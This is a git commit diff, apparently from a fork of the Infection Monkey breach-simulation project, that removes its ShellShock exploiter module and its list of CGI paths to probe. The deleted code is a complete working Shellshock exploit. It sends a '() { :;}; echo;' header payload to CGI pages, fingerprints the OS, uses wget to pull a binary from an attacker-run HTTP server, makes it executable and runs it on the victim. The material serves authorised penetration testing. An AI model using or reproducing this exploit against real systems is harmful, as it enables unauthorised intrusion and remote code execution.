forked from p15670423/monkey
Agent: Remove ShellShock exploiter
This commit is contained in:
parent
1e12a55240
commit
64b900b94d
|
@ -27,7 +27,6 @@
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"ShellShockExploiter",
|
|
||||||
"ElasticGroovyExploiter",
|
"ElasticGroovyExploiter",
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
|
|
|
@ -1,269 +0,0 @@
|
||||||
# Implementation is based on shellshock script provided
|
|
||||||
# https://github.com/nccgroup/shocker/blob/master/shocker.py
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import string
|
|
||||||
from random import SystemRandom
|
|
||||||
|
|
||||||
import requests
|
|
||||||
|
|
||||||
from common.utils.attack_utils import ScanStatus
|
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
|
||||||
from infection_monkey.exploit.shellshock_resources import CGI_FILES
|
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
|
||||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
|
||||||
from infection_monkey.model import DROPPER_ARG
|
|
||||||
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
|
|
||||||
from infection_monkey.utils.commands import build_monkey_commandline
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
TIMEOUT = 2
|
|
||||||
TEST_COMMAND = "/bin/uname -a"
|
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
|
||||||
LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
|
|
||||||
|
|
||||||
|
|
||||||
class ShellShockExploiter(HostExploiter):
|
|
||||||
_attacks = {"Content-type": "() { :;}; echo; "}
|
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ["linux"]
|
|
||||||
_EXPLOITED_SERVICE = "Bash"
|
|
||||||
|
|
||||||
def __init__(self, host):
|
|
||||||
super(ShellShockExploiter, self).__init__(host)
|
|
||||||
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
|
|
||||||
safe_random = SystemRandom()
|
|
||||||
self.success_flag = "".join(
|
|
||||||
safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20)
|
|
||||||
)
|
|
||||||
|
|
||||||
def _exploit_host(self):
|
|
||||||
# start by picking ports
|
|
||||||
candidate_services = {
|
|
||||||
service: self.host.services[service]
|
|
||||||
for service in self.host.services
|
|
||||||
if ("name" in self.host.services[service])
|
|
||||||
and (self.host.services[service]["name"] == "http")
|
|
||||||
}
|
|
||||||
|
|
||||||
valid_ports = [
|
|
||||||
(port, candidate_services["tcp-" + str(port)]["data"][1])
|
|
||||||
for port in self.HTTP
|
|
||||||
if "tcp-" + str(port) in candidate_services
|
|
||||||
]
|
|
||||||
http_ports = [port[0] for port in valid_ports if not port[1]]
|
|
||||||
https_ports = [port[0] for port in valid_ports if port[1]]
|
|
||||||
|
|
||||||
logger.info(
|
|
||||||
"Scanning %s, ports [%s] for vulnerable CGI pages"
|
|
||||||
% (self.host, ",".join([str(port[0]) for port in valid_ports]))
|
|
||||||
)
|
|
||||||
|
|
||||||
attackable_urls = []
|
|
||||||
# now for each port we want to check the entire URL list
|
|
||||||
for port in http_ports:
|
|
||||||
urls = self.check_urls(self.host.ip_addr, port)
|
|
||||||
attackable_urls.extend(urls)
|
|
||||||
for port in https_ports:
|
|
||||||
urls = self.check_urls(self.host.ip_addr, port, is_https=True)
|
|
||||||
attackable_urls.extend(urls)
|
|
||||||
# now for each URl we want to try and see if it's attackable
|
|
||||||
exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
|
|
||||||
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
|
|
||||||
|
|
||||||
# we want to report all vulnerable URLs even if we didn't succeed
|
|
||||||
self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
|
|
||||||
|
|
||||||
# now try URLs until we install something on victim
|
|
||||||
for _, url, header, exploit in exploitable_urls:
|
|
||||||
logger.info("Trying to attack host %s with %s URL" % (self.host, url))
|
|
||||||
# same attack script as sshexec
|
|
||||||
# for any failure, quit and don't try other URLs
|
|
||||||
if not self.host.os.get("type"):
|
|
||||||
try:
|
|
||||||
uname_os_attack = exploit + "/bin/uname -o"
|
|
||||||
uname_os = self.attack_page(url, header, uname_os_attack)
|
|
||||||
if "linux" in uname_os:
|
|
||||||
self.host.os["type"] = "linux"
|
|
||||||
else:
|
|
||||||
logger.info("SSH Skipping unknown os: %s", uname_os)
|
|
||||||
return False
|
|
||||||
except Exception as exc:
|
|
||||||
logger.debug(
|
|
||||||
"Error running uname os command on victim %r: (%s)", self.host, exc
|
|
||||||
)
|
|
||||||
return False
|
|
||||||
if not self.host.os.get("machine"):
|
|
||||||
try:
|
|
||||||
uname_machine_attack = exploit + "/bin/uname -m"
|
|
||||||
uname_machine = self.attack_page(url, header, uname_machine_attack)
|
|
||||||
if "" != uname_machine:
|
|
||||||
self.host.os["machine"] = uname_machine.lower().strip()
|
|
||||||
except Exception as exc:
|
|
||||||
logger.debug(
|
|
||||||
"Error running uname machine command on victim %r: (%s)", self.host, exc
|
|
||||||
)
|
|
||||||
return False
|
|
||||||
|
|
||||||
# copy the monkey
|
|
||||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
|
||||||
|
|
||||||
src_path = get_target_monkey(self.host)
|
|
||||||
if not src_path:
|
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
|
||||||
return False
|
|
||||||
|
|
||||||
if not self._create_lock_file(exploit, url, header):
|
|
||||||
logger.info("Another monkey is running shellshock exploit")
|
|
||||||
return True
|
|
||||||
|
|
||||||
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
|
|
||||||
|
|
||||||
if not http_path:
|
|
||||||
logger.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
|
||||||
return False
|
|
||||||
|
|
||||||
download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
|
|
||||||
|
|
||||||
download = exploit + download_command
|
|
||||||
self.attack_page(
|
|
||||||
url, header, download
|
|
||||||
) # we ignore failures here since it might take more than TIMEOUT time
|
|
||||||
|
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
|
||||||
http_thread.stop()
|
|
||||||
|
|
||||||
self._remove_lock_file(exploit, url, header)
|
|
||||||
|
|
||||||
if (http_thread.downloads != 1) or (
|
|
||||||
"ELF"
|
|
||||||
not in self.check_remote_file_exists(
|
|
||||||
url, header, exploit, dropper_target_path_linux
|
|
||||||
)
|
|
||||||
):
|
|
||||||
logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
|
||||||
continue
|
|
||||||
|
|
||||||
# turn the monkey into an executable
|
|
||||||
chmod = "/bin/chmod +x %s" % dropper_target_path_linux
|
|
||||||
run_path = exploit + chmod
|
|
||||||
self.attack_page(url, header, run_path)
|
|
||||||
T1222Telem(ScanStatus.USED, chmod, self.host).send()
|
|
||||||
|
|
||||||
# run the monkey
|
|
||||||
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
|
|
||||||
cmdline += build_monkey_commandline(
|
|
||||||
self.host,
|
|
||||||
get_monkey_depth() - 1,
|
|
||||||
dropper_target_path_linux,
|
|
||||||
)
|
|
||||||
cmdline += " & "
|
|
||||||
run_path = exploit + cmdline
|
|
||||||
self.attack_page(url, header, run_path)
|
|
||||||
|
|
||||||
logger.info(
|
|
||||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
|
||||||
self._config.dropper_target_path_linux,
|
|
||||||
self.host,
|
|
||||||
cmdline,
|
|
||||||
)
|
|
||||||
|
|
||||||
if not (
|
|
||||||
self.check_remote_file_exists(
|
|
||||||
url, header, exploit, self._config.monkey_log_path_linux
|
|
||||||
)
|
|
||||||
):
|
|
||||||
logger.info("Log file does not exist, monkey might not have run")
|
|
||||||
continue
|
|
||||||
self.add_executed_cmd(cmdline)
|
|
||||||
return True
|
|
||||||
|
|
||||||
return False
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def check_remote_file_exists(cls, url, header, exploit, file_path):
|
|
||||||
"""
|
|
||||||
Checks if a remote file exists and returns the content if so
|
|
||||||
file_path should be fully qualified
|
|
||||||
"""
|
|
||||||
cmdline = "/usr/bin/head -c 4 %s" % file_path
|
|
||||||
run_path = exploit + cmdline
|
|
||||||
resp = cls.attack_page(url, header, run_path)
|
|
||||||
if resp:
|
|
||||||
logger.info("File %s exists on remote host" % file_path)
|
|
||||||
return resp
|
|
||||||
|
|
||||||
def attempt_exploit(self, url, attacks=None):
|
|
||||||
# Flag used to identify whether the exploit has successfully caused the
|
|
||||||
# server to return a useful response
|
|
||||||
|
|
||||||
if not attacks:
|
|
||||||
attacks = self._attacks
|
|
||||||
|
|
||||||
logger.debug("Attack Flag is: %s" % self.success_flag)
|
|
||||||
|
|
||||||
logger.debug("Trying exploit for %s" % url)
|
|
||||||
for header, exploit in list(attacks.items()):
|
|
||||||
attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
|
|
||||||
result = self.attack_page(url, header, attack)
|
|
||||||
if self.success_flag in result:
|
|
||||||
logger.info("URL %s looks vulnerable" % url)
|
|
||||||
return True, url, header, exploit
|
|
||||||
else:
|
|
||||||
logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
|
|
||||||
return (False,)
|
|
||||||
|
|
||||||
def _create_lock_file(self, exploit, url, header):
|
|
||||||
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
|
|
||||||
return False
|
|
||||||
cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
|
|
||||||
self.attack_page(url, header, cmd)
|
|
||||||
return True
|
|
||||||
|
|
||||||
def _remove_lock_file(self, exploit, url, header):
|
|
||||||
cmd = exploit + "rm %s" % LOCK_HELPER_FILE
|
|
||||||
self.attack_page(url, header, cmd)
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def attack_page(url, header, attack):
|
|
||||||
result = ""
|
|
||||||
try:
|
|
||||||
logger.debug("Header is: %s" % header)
|
|
||||||
logger.debug("Attack is: %s" % attack)
|
|
||||||
r = requests.get( # noqa: DUO123
|
|
||||||
url, headers={header: attack}, verify=False, timeout=TIMEOUT
|
|
||||||
)
|
|
||||||
result = r.content.decode()
|
|
||||||
return result
|
|
||||||
except requests.exceptions.RequestException as exc:
|
|
||||||
logger.debug("Failed to run, exception %s" % exc)
|
|
||||||
return result
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def check_urls(host, port, is_https=False, url_list=CGI_FILES):
|
|
||||||
"""
|
|
||||||
Checks if which urls exist
|
|
||||||
:return: Sequence of URLs to try and attack
|
|
||||||
"""
|
|
||||||
attack_path = "http://"
|
|
||||||
if is_https:
|
|
||||||
attack_path = "https://"
|
|
||||||
attack_path = attack_path + str(host) + ":" + str(port)
|
|
||||||
reqs = []
|
|
||||||
timeout = False
|
|
||||||
attack_urls = [attack_path + url for url in url_list]
|
|
||||||
for u in attack_urls:
|
|
||||||
try:
|
|
||||||
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123
|
|
||||||
except requests.Timeout:
|
|
||||||
timeout = True
|
|
||||||
break
|
|
||||||
if timeout:
|
|
||||||
logger.debug(
|
|
||||||
"Some connections timed out while sending request to potentially vulnerable "
|
|
||||||
"urls."
|
|
||||||
)
|
|
||||||
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
|
|
||||||
urls = [resp.url for resp in valid_resps]
|
|
||||||
|
|
||||||
return urls
|
|
|
@ -1,408 +0,0 @@
|
||||||
# resource for shellshock attack
|
|
||||||
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
|
||||||
|
|
||||||
CGI_FILES = (
|
|
||||||
r"/",
|
|
||||||
r"/admin.cgi",
|
|
||||||
r"/administrator.cgi",
|
|
||||||
r"/agora.cgi",
|
|
||||||
r"/aktivate/cgi-bin/catgy.cgi",
|
|
||||||
r"/analyse.cgi",
|
|
||||||
r"/apps/web/vs_diag.cgi",
|
|
||||||
r"/axis-cgi/buffer/command.cgi",
|
|
||||||
r"/b2-include/b2edit.showposts.php",
|
|
||||||
r"/bandwidth/index.cgi",
|
|
||||||
r"/bigconf.cgi",
|
|
||||||
r"/cartcart.cgi",
|
|
||||||
r"/cart.cgi",
|
|
||||||
r"/ccbill/whereami.cgi",
|
|
||||||
r"/cgi-bin/14all-1.1.cgi",
|
|
||||||
r"/cgi-bin/14all.cgi",
|
|
||||||
r"/cgi-bin/a1disp3.cgi",
|
|
||||||
r"/cgi-bin/a1stats/a1disp3.cgi",
|
|
||||||
r"/cgi-bin/a1stats/a1disp4.cgi",
|
|
||||||
r"/cgi-bin/addbanner.cgi",
|
|
||||||
r"/cgi-bin/add_ftp.cgi",
|
|
||||||
r"/cgi-bin/adduser.cgi",
|
|
||||||
r"/cgi-bin/admin/admin.cgi",
|
|
||||||
r"/cgi-bin/admin.cgi",
|
|
||||||
r"/cgi-bin/admin/getparam.cgi",
|
|
||||||
r"/cgi-bin/adminhot.cgi",
|
|
||||||
r"/cgi-bin/admin.pl",
|
|
||||||
r"/cgi-bin/admin/setup.cgi",
|
|
||||||
r"/cgi-bin/adminwww.cgi",
|
|
||||||
r"/cgi-bin/af.cgi",
|
|
||||||
r"/cgi-bin/aglimpse.cgi",
|
|
||||||
r"/cgi-bin/alienform.cgi",
|
|
||||||
r"/cgi-bin/AnyBoard.cgi",
|
|
||||||
r"/cgi-bin/architext_query.cgi",
|
|
||||||
r"/cgi-bin/astrocam.cgi",
|
|
||||||
r"/cgi-bin/AT-admin.cgi",
|
|
||||||
r"/cgi-bin/AT-generate.cgi",
|
|
||||||
r"/cgi-bin/auction/auction.cgi",
|
|
||||||
r"/cgi-bin/auktion.cgi",
|
|
||||||
r"/cgi-bin/ax-admin.cgi",
|
|
||||||
r"/cgi-bin/ax.cgi",
|
|
||||||
r"/cgi-bin/axs.cgi",
|
|
||||||
r"/cgi-bin/badmin.cgi",
|
|
||||||
r"/cgi-bin/banner.cgi",
|
|
||||||
r"/cgi-bin/bannereditor.cgi",
|
|
||||||
r"/cgi-bin/bb-ack.sh",
|
|
||||||
r"/cgi-bin/bb-histlog.sh",
|
|
||||||
r"/cgi-bin/bb-hist.sh",
|
|
||||||
r"/cgi-bin/bb-hostsvc.sh",
|
|
||||||
r"/cgi-bin/bb-replog.sh",
|
|
||||||
r"/cgi-bin/bb-rep.sh",
|
|
||||||
r"/cgi-bin/bbs_forum.cgi",
|
|
||||||
r"/cgi-bin/bigconf.cgi",
|
|
||||||
r"/cgi-bin/bizdb1-search.cgi",
|
|
||||||
r"/cgi-bin/blog/mt-check.cgi",
|
|
||||||
r"/cgi-bin/blog/mt-load.cgi",
|
|
||||||
r"/cgi-bin/bnbform.cgi",
|
|
||||||
r"/cgi-bin/book.cgi",
|
|
||||||
r"/cgi-bin/boozt/admin/index.cgi",
|
|
||||||
r"/cgi-bin/bsguest.cgi",
|
|
||||||
r"/cgi-bin/bslist.cgi",
|
|
||||||
r"/cgi-bin/build.cgi",
|
|
||||||
r"/cgi-bin/bulk/bulk.cgi",
|
|
||||||
r"/cgi-bin/cached_feed.cgi",
|
|
||||||
r"/cgi-bin/cachemgr.cgi",
|
|
||||||
r"/cgi-bin/calendar/index.cgi",
|
|
||||||
r"/cgi-bin/cartmanager.cgi",
|
|
||||||
r"/cgi-bin/cbmc/forums.cgi",
|
|
||||||
r"/cgi-bin/ccvsblame.cgi",
|
|
||||||
r"/cgi-bin/c_download.cgi",
|
|
||||||
r"/cgi-bin/cgforum.cgi",
|
|
||||||
r"/cgi-bin/.cgi",
|
|
||||||
r"/cgi-bin/cgi_process",
|
|
||||||
r"/cgi-bin/classified.cgi",
|
|
||||||
r"/cgi-bin/classifieds.cgi",
|
|
||||||
r"/cgi-bin/classifieds/classifieds.cgi",
|
|
||||||
r"/cgi-bin/classifieds/index.cgi",
|
|
||||||
r"/cgi-bin/.cobalt/alert/service.cgi",
|
|
||||||
r"/cgi-bin/.cobalt/message/message.cgi",
|
|
||||||
r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
|
|
||||||
r"/cgi-bin/commandit.cgi",
|
|
||||||
r"/cgi-bin/commerce.cgi",
|
|
||||||
r"/cgi-bin/common/listrec.pl",
|
|
||||||
r"/cgi-bin/compatible.cgi",
|
|
||||||
r"/cgi-bin/Count.cgi",
|
|
||||||
r"/cgi-bin/csChatRBox.cgi",
|
|
||||||
r"/cgi-bin/csGuestBook.cgi",
|
|
||||||
r"/cgi-bin/csLiveSupport.cgi",
|
|
||||||
r"/cgi-bin/CSMailto.cgi",
|
|
||||||
r"/cgi-bin/CSMailto/CSMailto.cgi",
|
|
||||||
r"/cgi-bin/csNews.cgi",
|
|
||||||
r"/cgi-bin/csNewsPro.cgi",
|
|
||||||
r"/cgi-bin/csPassword.cgi",
|
|
||||||
r"/cgi-bin/csPassword/csPassword.cgi",
|
|
||||||
r"/cgi-bin/csSearch.cgi",
|
|
||||||
r"/cgi-bin/csv_db.cgi",
|
|
||||||
r"/cgi-bin/cvsblame.cgi",
|
|
||||||
r"/cgi-bin/cvslog.cgi",
|
|
||||||
r"/cgi-bin/cvsquery.cgi",
|
|
||||||
r"/cgi-bin/cvsqueryform.cgi",
|
|
||||||
r"/cgi-bin/day5datacopier.cgi",
|
|
||||||
r"/cgi-bin/day5datanotifier.cgi",
|
|
||||||
r"/cgi-bin/db_manager.cgi",
|
|
||||||
r"/cgi-bin/dbman/db.cgi",
|
|
||||||
r"/cgi-bin/dcforum.cgi",
|
|
||||||
r"/cgi-bin/dcshop.cgi",
|
|
||||||
r"/cgi-bin/dfire.cgi",
|
|
||||||
r"/cgi-bin/diagnose.cgi",
|
|
||||||
r"/cgi-bin/dig.cgi",
|
|
||||||
r"/cgi-bin/directorypro.cgi",
|
|
||||||
r"/cgi-bin/download.cgi",
|
|
||||||
r"/cgi-bin/e87_Ba79yo87.cgi",
|
|
||||||
r"/cgi-bin/emu/html/emumail.cgi",
|
|
||||||
r"/cgi-bin/emumail.cgi",
|
|
||||||
r"/cgi-bin/emumail/emumail.cgi",
|
|
||||||
r"/cgi-bin/enter.cgi",
|
|
||||||
r"/cgi-bin/environ.cgi",
|
|
||||||
r"/cgi-bin/ezadmin.cgi",
|
|
||||||
r"/cgi-bin/ezboard.cgi",
|
|
||||||
r"/cgi-bin/ezman.cgi",
|
|
||||||
r"/cgi-bin/ezshopper2/loadpage.cgi",
|
|
||||||
r"/cgi-bin/ezshopper3/loadpage.cgi",
|
|
||||||
r"/cgi-bin/ezshopper/loadpage.cgi",
|
|
||||||
r"/cgi-bin/ezshopper/search.cgi",
|
|
||||||
r"/cgi-bin/faqmanager.cgi",
|
|
||||||
r"/cgi-bin/FileSeek2.cgi",
|
|
||||||
r"/cgi-bin/FileSeek.cgi",
|
|
||||||
r"/cgi-bin/finger.cgi",
|
|
||||||
r"/cgi-bin/flexform.cgi",
|
|
||||||
r"/cgi-bin/fom.cgi",
|
|
||||||
r"/cgi-bin/fom/fom.cgi",
|
|
||||||
r"/cgi-bin/FormHandler.cgi",
|
|
||||||
r"/cgi-bin/FormMail.cgi",
|
|
||||||
r"/cgi-bin/gbadmin.cgi",
|
|
||||||
r"/cgi-bin/gbook/gbook.cgi",
|
|
||||||
r"/cgi-bin/generate.cgi",
|
|
||||||
r"/cgi-bin/getdoc.cgi",
|
|
||||||
r"/cgi-bin/gH.cgi",
|
|
||||||
r"/cgi-bin/gm-authors.cgi",
|
|
||||||
r"/cgi-bin/gm.cgi",
|
|
||||||
r"/cgi-bin/gm-cplog.cgi",
|
|
||||||
r"/cgi-bin/guestbook.cgi",
|
|
||||||
r"/cgi-bin/handler",
|
|
||||||
r"/cgi-bin/handler.cgi",
|
|
||||||
r"/cgi-bin/handler/netsonar",
|
|
||||||
r"/cgi-bin/hitview.cgi",
|
|
||||||
r"/cgi-bin/hsx.cgi",
|
|
||||||
r"/cgi-bin/html2chtml.cgi",
|
|
||||||
r"/cgi-bin/html2wml.cgi",
|
|
||||||
r"/cgi-bin/htsearch.cgi",
|
|
||||||
r"/cgi-bin/hw.sh", # testing
|
|
||||||
r"/cgi-bin/icat",
|
|
||||||
r"/cgi-bin/if/admin/nph-build.cgi",
|
|
||||||
r"/cgi-bin/ikonboard/help.cgi",
|
|
||||||
r"/cgi-bin/ImageFolio/admin/admin.cgi",
|
|
||||||
r"/cgi-bin/imageFolio.cgi",
|
|
||||||
r"/cgi-bin/index.cgi",
|
|
||||||
r"/cgi-bin/infosrch.cgi",
|
|
||||||
r"/cgi-bin/jammail.pl",
|
|
||||||
r"/cgi-bin/journal.cgi",
|
|
||||||
r"/cgi-bin/lastlines.cgi",
|
|
||||||
r"/cgi-bin/loadpage.cgi",
|
|
||||||
r"/cgi-bin/login.cgi",
|
|
||||||
r"/cgi-bin/logit.cgi",
|
|
||||||
r"/cgi-bin/log-reader.cgi",
|
|
||||||
r"/cgi-bin/lookwho.cgi",
|
|
||||||
r"/cgi-bin/lwgate.cgi",
|
|
||||||
r"/cgi-bin/MachineInfo",
|
|
||||||
r"/cgi-bin/MachineInfo",
|
|
||||||
r"/cgi-bin/magiccard.cgi",
|
|
||||||
r"/cgi-bin/mail/emumail.cgi",
|
|
||||||
r"/cgi-bin/maillist.cgi",
|
|
||||||
r"/cgi-bin/mailnews.cgi",
|
|
||||||
r"/cgi-bin/mail/nph-mr.cgi",
|
|
||||||
r"/cgi-bin/main.cgi",
|
|
||||||
r"/cgi-bin/main_menu.pl",
|
|
||||||
r"/cgi-bin/man.sh",
|
|
||||||
r"/cgi-bin/mini_logger.cgi",
|
|
||||||
r"/cgi-bin/mmstdod.cgi",
|
|
||||||
r"/cgi-bin/moin.cgi",
|
|
||||||
r"/cgi-bin/mojo/mojo.cgi",
|
|
||||||
r"/cgi-bin/mrtg.cgi",
|
|
||||||
r"/cgi-bin/mt.cgi",
|
|
||||||
r"/cgi-bin/mt/mt.cgi",
|
|
||||||
r"/cgi-bin/mt/mt-check.cgi",
|
|
||||||
r"/cgi-bin/mt/mt-load.cgi",
|
|
||||||
r"/cgi-bin/mt-static/mt-check.cgi",
|
|
||||||
r"/cgi-bin/mt-static/mt-load.cgi",
|
|
||||||
r"/cgi-bin/musicqueue.cgi",
|
|
||||||
r"/cgi-bin/myguestbook.cgi",
|
|
||||||
r"/cgi-bin/.namazu.cgi",
|
|
||||||
r"/cgi-bin/nbmember.cgi",
|
|
||||||
r"/cgi-bin/netauth.cgi",
|
|
||||||
r"/cgi-bin/netpad.cgi",
|
|
||||||
r"/cgi-bin/newsdesk.cgi",
|
|
||||||
r"/cgi-bin/nlog-smb.cgi",
|
|
||||||
r"/cgi-bin/nph-emumail.cgi",
|
|
||||||
r"/cgi-bin/nph-exploitscanget.cgi",
|
|
||||||
r"/cgi-bin/nph-publish.cgi",
|
|
||||||
r"/cgi-bin/nph-test.cgi",
|
|
||||||
r"/cgi-bin/pagelog.cgi",
|
|
||||||
r"/cgi-bin/pbcgi.cgi",
|
|
||||||
r"/cgi-bin/perlshop.cgi",
|
|
||||||
r"/cgi-bin/pfdispaly.cgi",
|
|
||||||
r"/cgi-bin/pfdisplay.cgi",
|
|
||||||
r"/cgi-bin/phf.cgi",
|
|
||||||
r"/cgi-bin/photo/manage.cgi",
|
|
||||||
r"/cgi-bin/photo/protected/manage.cgi",
|
|
||||||
r"/cgi-bin/php-cgi",
|
|
||||||
r"/cgi-bin/php.cgi",
|
|
||||||
r"/cgi-bin/php.fcgi",
|
|
||||||
r"/cgi-bin/ping.sh",
|
|
||||||
r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
|
|
||||||
r"/cgi-bin/pollssi.cgi",
|
|
||||||
r"/cgi-bin/postcards.cgi",
|
|
||||||
r"/cgi-bin/powerup/r.cgi",
|
|
||||||
r"/cgi-bin/printenv",
|
|
||||||
r"/cgi-bin/probecontrol.cgi",
|
|
||||||
r"/cgi-bin/profile.cgi",
|
|
||||||
r"/cgi-bin/publisher/search.cgi",
|
|
||||||
r"/cgi-bin/quickstore.cgi",
|
|
||||||
r"/cgi-bin/quizme.cgi",
|
|
||||||
r"/cgi-bin/ratlog.cgi",
|
|
||||||
r"/cgi-bin/r.cgi",
|
|
||||||
r"/cgi-bin/register.cgi",
|
|
||||||
r"/cgi-bin/replicator/webpage.cgi/",
|
|
||||||
r"/cgi-bin/responder.cgi",
|
|
||||||
r"/cgi-bin/robadmin.cgi",
|
|
||||||
r"/cgi-bin/robpoll.cgi",
|
|
||||||
r"/cgi-bin/rtpd.cgi",
|
|
||||||
r"/cgi-bin/sbcgi/sitebuilder.cgi",
|
|
||||||
r"/cgi-bin/scoadminreg.cgi",
|
|
||||||
r"/cgi-bin-sdb/printenv",
|
|
||||||
r"/cgi-bin/sdbsearch.cgi",
|
|
||||||
r"/cgi-bin/search",
|
|
||||||
r"/cgi-bin/search.cgi",
|
|
||||||
r"/cgi-bin/search/search.cgi",
|
|
||||||
r"/cgi-bin/sendform.cgi",
|
|
||||||
r"/cgi-bin/shop.cgi",
|
|
||||||
r"/cgi-bin/shopper.cgi",
|
|
||||||
r"/cgi-bin/shopplus.cgi",
|
|
||||||
r"/cgi-bin/showcheckins.cgi",
|
|
||||||
r"/cgi-bin/simplestguest.cgi",
|
|
||||||
r"/cgi-bin/simplestmail.cgi",
|
|
||||||
r"/cgi-bin/smartsearch.cgi",
|
|
||||||
r"/cgi-bin/smartsearch/smartsearch.cgi",
|
|
||||||
r"/cgi-bin/snorkerz.bat",
|
|
||||||
r"/cgi-bin/snorkerz.bat",
|
|
||||||
r"/cgi-bin/snorkerz.cmd",
|
|
||||||
r"/cgi-bin/snorkerz.cmd",
|
|
||||||
r"/cgi-bin/sojourn.cgi",
|
|
||||||
r"/cgi-bin/spin_client.cgi",
|
|
||||||
r"/cgi-bin/start.cgi",
|
|
||||||
r"/cgi-bin/status",
|
|
||||||
r"/cgi-bin/status_cgi",
|
|
||||||
r"/cgi-bin/store/agora.cgi",
|
|
||||||
r"/cgi-bin/store.cgi",
|
|
||||||
r"/cgi-bin/store/index.cgi",
|
|
||||||
r"/cgi-bin/survey.cgi",
|
|
||||||
r"/cgi-bin/sync.cgi",
|
|
||||||
r"/cgi-bin/talkback.cgi",
|
|
||||||
r"/cgi-bin/technote/main.cgi",
|
|
||||||
r"/cgi-bin/test2.pl",
|
|
||||||
r"/cgi-bin/test-cgi",
|
|
||||||
r"/cgi-bin/test.cgi",
|
|
||||||
r"/cgi-bin/testing_whatever",
|
|
||||||
r"/cgi-bin/test/test.cgi",
|
|
||||||
r"/cgi-bin/tidfinder.cgi",
|
|
||||||
r"/cgi-bin/tigvote.cgi",
|
|
||||||
r"/cgi-bin/title.cgi",
|
|
||||||
r"/cgi-bin/top.cgi",
|
|
||||||
r"/cgi-bin/traffic.cgi",
|
|
||||||
r"/cgi-bin/troops.cgi",
|
|
||||||
r"/cgi-bin/ttawebtop.cgi/",
|
|
||||||
r"/cgi-bin/ultraboard.cgi",
|
|
||||||
r"/cgi-bin/upload.cgi",
|
|
||||||
r"/cgi-bin/urlcount.cgi",
|
|
||||||
r"/cgi-bin/viewcvs.cgi",
|
|
||||||
r"/cgi-bin/view_help.cgi",
|
|
||||||
r"/cgi-bin/viralator.cgi",
|
|
||||||
r"/cgi-bin/virgil.cgi",
|
|
||||||
r"/cgi-bin/vote.cgi",
|
|
||||||
r"/cgi-bin/vpasswd.cgi",
|
|
||||||
r"/cgi-bin/way-board.cgi",
|
|
||||||
r"/cgi-bin/way-board/way-board.cgi",
|
|
||||||
r"/cgi-bin/webbbs.cgi",
|
|
||||||
r"/cgi-bin/webcart/webcart.cgi",
|
|
||||||
r"/cgi-bin/webdist.cgi",
|
|
||||||
r"/cgi-bin/webif.cgi",
|
|
||||||
r"/cgi-bin/webmail/html/emumail.cgi",
|
|
||||||
r"/cgi-bin/webmap.cgi",
|
|
||||||
r"/cgi-bin/webspirs.cgi",
|
|
||||||
r"/cgi-bin/Web_Store/web_store.cgi",
|
|
||||||
r"/cgi-bin/whois.cgi",
|
|
||||||
r"/cgi-bin/whois_raw.cgi",
|
|
||||||
r"/cgi-bin/whois/whois.cgi",
|
|
||||||
r"/cgi-bin/wrap",
|
|
||||||
r"/cgi-bin/wrap.cgi",
|
|
||||||
r"/cgi-bin/wwwboard.cgi.cgi",
|
|
||||||
r"/cgi-bin/YaBB/YaBB.cgi",
|
|
||||||
r"/cgi-bin/zml.cgi",
|
|
||||||
r"/cgi-mod/index.cgi",
|
|
||||||
r"/cgis/wwwboard/wwwboard.cgi",
|
|
||||||
r"/cgi-sys/addalink.cgi",
|
|
||||||
r"/cgi-sys/defaultwebpage.cgi",
|
|
||||||
r"/cgi-sys/domainredirect.cgi",
|
|
||||||
r"/cgi-sys/entropybanner.cgi",
|
|
||||||
r"/cgi-sys/entropysearch.cgi",
|
|
||||||
r"/cgi-sys/FormMail-clone.cgi",
|
|
||||||
r"/cgi-sys/helpdesk.cgi",
|
|
||||||
r"/cgi-sys/mchat.cgi",
|
|
||||||
r"/cgi-sys/randhtml.cgi",
|
|
||||||
r"/cgi-sys/realhelpdesk.cgi",
|
|
||||||
r"/cgi-sys/realsignup.cgi",
|
|
||||||
r"/cgi-sys/signup.cgi",
|
|
||||||
r"/connector.cgi",
|
|
||||||
r"/cp/rac/nsManager.cgi",
|
|
||||||
r"/create_release.sh",
|
|
||||||
r"/CSNews.cgi",
|
|
||||||
r"/csPassword.cgi",
|
|
||||||
